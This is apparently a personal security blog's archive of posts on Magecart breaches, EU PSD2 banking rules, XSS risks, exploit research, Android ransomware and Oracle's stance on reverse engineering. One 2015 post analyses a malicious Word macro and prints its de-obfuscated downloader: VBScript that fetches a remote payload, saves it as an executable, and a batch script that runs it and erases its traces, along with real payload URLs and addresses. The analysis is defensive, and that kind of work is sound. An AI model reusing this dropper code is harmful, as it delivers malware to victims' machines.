Archive

Posts Tagged ‘security’

OMG, I use that site!

November 20, 2019 Leave a comment

In what is clearly becoming so sad it is now funny, another popular online store was hijacked. Macy’s fell victim to a third party inclusion vulnerability and like so may big retailers before them, some of you may be victim to the scorge of the Magecart gang.

Not even the FBI can help these retailers (or more likely they don’t listen or don’t care) as more and more of them unwittingly become infected.

CyberSecurity is now becoming the most important thing to worry about as a service provide AND as an online shopper. Be careful where you tread…

More details are available from Bleeping Computer.

Categories: General Tags: ,

New European rules for mobile banking apps coming to a device near you…

July 26, 2019 Leave a comment

The world is clearly a better place now that we carry computers in our back pocket but we need an increase in security measures for payment transactions and therefore we will require an increase in regulation, such as the PSD2 from European Commission.

The Payment Services Directive mandates compliance by September 2019 and aims to regulate banks, payment service providers and electronic payments to include security features to protect consumers across digital channels. The PSD2 legislation will require financial services in the European Union (EU) to contribute to a more integrated, secure, and efficient payments ecosystem.

The PSD2 directive requires financial institutions to:

  • Provide/Implement a monitoring mechanism in their apps to detect/report signs of malware.
  • Provide security measures in their app to mitigate risk for the user device.
  • Ensure consumers have a secure environment to execute their financial transactions

In Article 2 and Article 9 of the directive, PSD2 highlights Strong Customer Authentication (SCA) and Safe Execution Environment (SEE), which requires de-risking across various threat vectors impacting mobile apps.

These include detecting compromised devices (eg: jailbroken or rooted), unsafe environments (such as a fake or malicious wi-fi), as well as malware and vulnerabilities within the application execution environment. PSD2 also includes RTS (Regulatory Technical Standards), which are regulatory requirements set by the European Banking Authority (EBA) to ensure that payments across the EU are secure, fair & efficient.

To meet these requirements, financial institutions should add strong security capabilities like binary protections to their mobile apps. These controls are designed to protect against known and unknown threats on users’ devices.

Mobile banking apps should also be able to detect when they are installed on risky devices and consider restricting access to high value banking services until those risks have been remediated.

Categories: Mobile, security Tags: ,

Web servers are still vulnerable…

April 28, 2018 Leave a comment

In a survey published on an often referenced support site for developers (Stack Overflow), they recently confirmed that JavaScript is the most popular programming language for the 6th year in a row. Almost 70% of the respondents claim that they visit searching for help on this subject so it may not come as a surprise that JavaScript is also the primary cause of vulnerabilities on websites today.

In a blog post from the vendor that brings us one of the most popular tool for hacking websites and finding vulnerabilities, Portswigger writes a great article in which they detail a number of methods that can be used to abuse JavaScript and to bypass cross site scripting mitigation by most frameworks.

There are thousands of ways that can be used to bypass XSS in websites and web developers should already know this. XSS is the number one method to compromise a browser which, in combination with privilege escalation can allow an attacker to take over your computer. Even script kiddies can capture session tokens or cookies from websites without proper security controls that can be used to login as you without even knowing your password. Here is a list of the risks in order of importance for an attacker;

  1. Account hijacking
  2. Credential stealing
  3. Sensitive Data Leakage
  4. Drive by Downloading
  5. Keyloggers/Scanners
  6. Vandalism

Don’t ignore these risks on your websites, public facing or not. If you login to a website often in your organization and it is vulnerable to cross site scripting, teach your users how to identify security risks that could be used to harvest credentials and expose them to malicious attacks. You may also want to make sure that your sites are tested to ensure they are not vulnerable to this type of attack. With Phishing attacks being the number one method that pentesters gain access to your organization, xss is the primary method being used.

 

Categories: security, Work related Tags: ,

Exploits are Everywhere

October 15, 2016 2 comments

I recently went through and completed, what I consider to be the hardest and most informative technical course and examination out there, the GIAC Exploit Researcher and Advanced Penetration Tester known as GPXN. What I learned was that there is a lot of opportunity for the bad guys to get control.

As a White hat hacker, I am asked to engage in a variety of activities, most of which are network related. For some of the hackers out there, your goal is to utilize a wide variety of tools to identify weaknesses in the defenses and/or the applications that are running and to overcome the controls in place to protect the data.

To some of the security researchers out there, Exploit writing is the next logical step to transition. As an attacker, if you are fixated on a target and you have exhausted all of your tools and tricks, you are left with little else but to find some type of vulnerability and write an exploit for it. As we purchase and add more and more items to our digital world, the odds are stacked in favour of the bad guy.

Many people have surmised that we are finding so many bugs now because programmers are making so many mistakes but I disagree. I feel that we are finding so many bugs because there ARE so many bugs. Some of us just got better at finding them.

Lets take the recent SSL vulnerability that was exposed for many of the Internet of Things (IoT) devices ( https://www.wired.com/2016/10/akamai-finds-longtime-security-flaw-2-million-devices/). Akamai researchers would have you believe that this is somehow a recent find but there are references to the dangers of ssh port forwarding over a decade ago ( http://www.informit.com/articles/article.aspx?p=602977 ).

Earlier in 2016 we have reports that Gnu Lib C share library has a critical vulnerability ( https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html). Admittedly this is very hard to exploit but as more and more people learn how to looks for these types of bugs, we are going to find out about them.

My recently certification has taught me that bugs are everywhere, in the mobile devices we carry, in our cars, in our thermostats. We just have to get better at looking for them.

A word to wise, learn about all the electronics you own, keep them up to date if they are recent purchases and be prepared to give them up if they are not. As a pentester, I  am looking for older vulnerable devices that are connected to your Wi-Fi or cabled networks at home or in the office as a bulkhead to allow me to get a foothold. There has never been a better time to discard those older routers and VoIP phones.

 

Categories: Work related Tags:

Received a word file from someone – how bad could it be if you open it?

August 20, 2015 Leave a comment

It used to be files that were executable (like .com, .exe .zip, .vbs, etc.) were bad to open when you received them in your email. Then came the pictures or URLs you received in your email because mail clients like Outlook would automatically preview them which results in running them without opening the email but how bad could it be to open a word document?

I wanted to spend a little time diving into what you might fine circulating around now…

I received a word document from an unknown sender so rather than opening the document I was able to load it on a diagnostic Linux server to see what is inside this document. (The concern is not for anything that is saved in the body of the document itself but rather the macros that come with the document.) ALERT – Geek stuff to follow…

As you view the code you may notice that someone has tried to obfuscate the code. This is evident by viewing some of the names of the functions and is common for developers who wish to make reverse engineering difficult.

MAL-Module1

Module1

 

This visual basic module is used to create the subroutine that will be executed and with a loop that continues to run (while true). It also creates a function that may be used to find the temp directory (Environ())

 There is also a module that is responsible for creating the ‘work’ script and runs or executes the code. MAL-Module2

Below we see that the attackers are beginning to think smarter not harder. This URL uses a 302 redirect to re-establish the connection over a secure TLS channel to the same host. SSL traffic cannot be sniffed as easily so this is another attempt to obfuscate the traffic.

Finally after the third macro is run we have a connection to a website called mirai2000.com which starts the exploit. I have tried to un-obfuscate the connection by replacing the variables to MAL-TCP-redirectcome up with the following script;

strTecation = “pioneer9.exe”
frgea =”MSXML2.ServerXMLHTTP”
Set objXMLHTTP = CreateObject(frgea)
objXMLHTTP.open “GET”, paytina, False
objXMLHTTP.send()
ahdjqg = “ADODB.Stream”
Set objADOStream = CreateObject(ahdjqg)
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile strTecation
objADOStream.Close
$$
@echo off
:nqdjwkn
cscript.exe pioneercranberry.vbs
ping 2.2.1.1 -n 4
:windows
pioneer9.exe
:loop
ping 1.3.1.2 -n 1
del pioneercranberry.vbs
del pioneercranberry.bat
if exist pioneercranberry.bat goto loop
if exist pioneercranberry.vbs goto loop
exit

Analysis:

We see a script that is downloaded as pioneercranberry.vbs (GET /777763172631572.txt from mirai2000.com).

We then download a second file (GET /rara.txt which downloads a file from dropbox (https://www.dropbox.com/s/x3igq1hnugevjp0/3d8.exe?dl=1 that appears to be a windows firewall shell?) and save it as an executable (pioneer9).

When the file (pioneercranberry.vbs) is run we see a few ping requests to an IP address (2.2.1.1) in France (IP2000-ADSL-BAS).

Next we download an executable (Trojan) from an IP address (66.240.183.19) on the onx.com network using SSL.

Finally we send a single ping to an IP address (1.3.1.2) in China (CHINANET-GD)…hmmm.

I also see evidence of a teamviewer executable being downloaded (perhaps part of the Trojan above) but it fails to run because of a license issue from an IP address (178.255.155.118) in Italy (ANEXIA-NET).

——————————–

All of this activity because I opened a Microsoft Word document. All carefully obfuscated to evade Virus protection and Application level proxies and filters.

Sophos labels this Trojan as Troj/Agent-AOHW. Unfortunately as of this morning the site no longer works so I am unable to complete my analysis.

The moral of this story is…be careful when dealing with ANY file attachment in email. A good rule of thumb is if you didn’t ask for it DON’T open it.

Categories: General Tags: ,

Its the FBI and we have your phone surrounded…

August 14, 2015 Leave a comment

Just when you though it was safe to use your android smart phone there are several vulnerabilities you should be aware of (great now I need to monitor and patch my cell phones too? – yes Virginia, just one more thing you need to do this week).

There are reported connections from a Command and Control server (C2) located in Canada and Germany for a new ransomware for your phone that impersonates the FBI. Claiming that it detected pornographic images on your phone this message asks you to pay a fine of $500 and as proof it shows you a picture of yourself (taken with a front facing camera) and your Internet IP address of the phone (everyone has a data plan nowadays right?)

Using a hidden feature of your phone, it can wake your device out of idle and report in to a C2 every minute without any sign that it is doing so (you might be noticing that your battery life has gotten quite poor, this would probably require additional power). It will also give the attackers a way to connect to your device using a backdoor.

Read more about it here – http://blog.fortinet.com/post/locker-an-android-ransomware-full-of-surprises

Edit: This is just another variant of the same ransomware family reported earlier this year. (See here). Unfortunately there is no Anti Virus for mobile phones that have heuristic scanning so don’t rely on anything you have installed to protect you from these types of attacks.

Categories: General Tags: ,

Security industry reacts to Oracle’s CSO missive | CSO Online

August 13, 2015 Leave a comment

Ever wonder where we will all be in 5 or 10 years? I would never had seen this coming – I mean this could be an example of professional hubris – read about how the chief security officer at Oracle thought it was time to tell it’s users to play nicely or ‘we will take our wagon away from you’.

This is just a glimpse of the next version of the end user license agreement (EULA) that we all just click on before using the software that it was written for. Judging from the industry reaction it could be a little ways off before a large company like oracle tries to flex it’s muscles but mark my words, reverse engineering software to find holes will likely lead us back to a time before open source. Companies should embrace the open architecture and provide a rich ‘bug bounty’ program if they do not have the talent inhouse to keep up with demand.

Read more on the article below and check out the archive of the post before it was pulled off the site.

http://www.csoonline.com/article/2970226/application-security/security-industry-reacts-to-oracles-cso-missive.html

Categories: General Tags: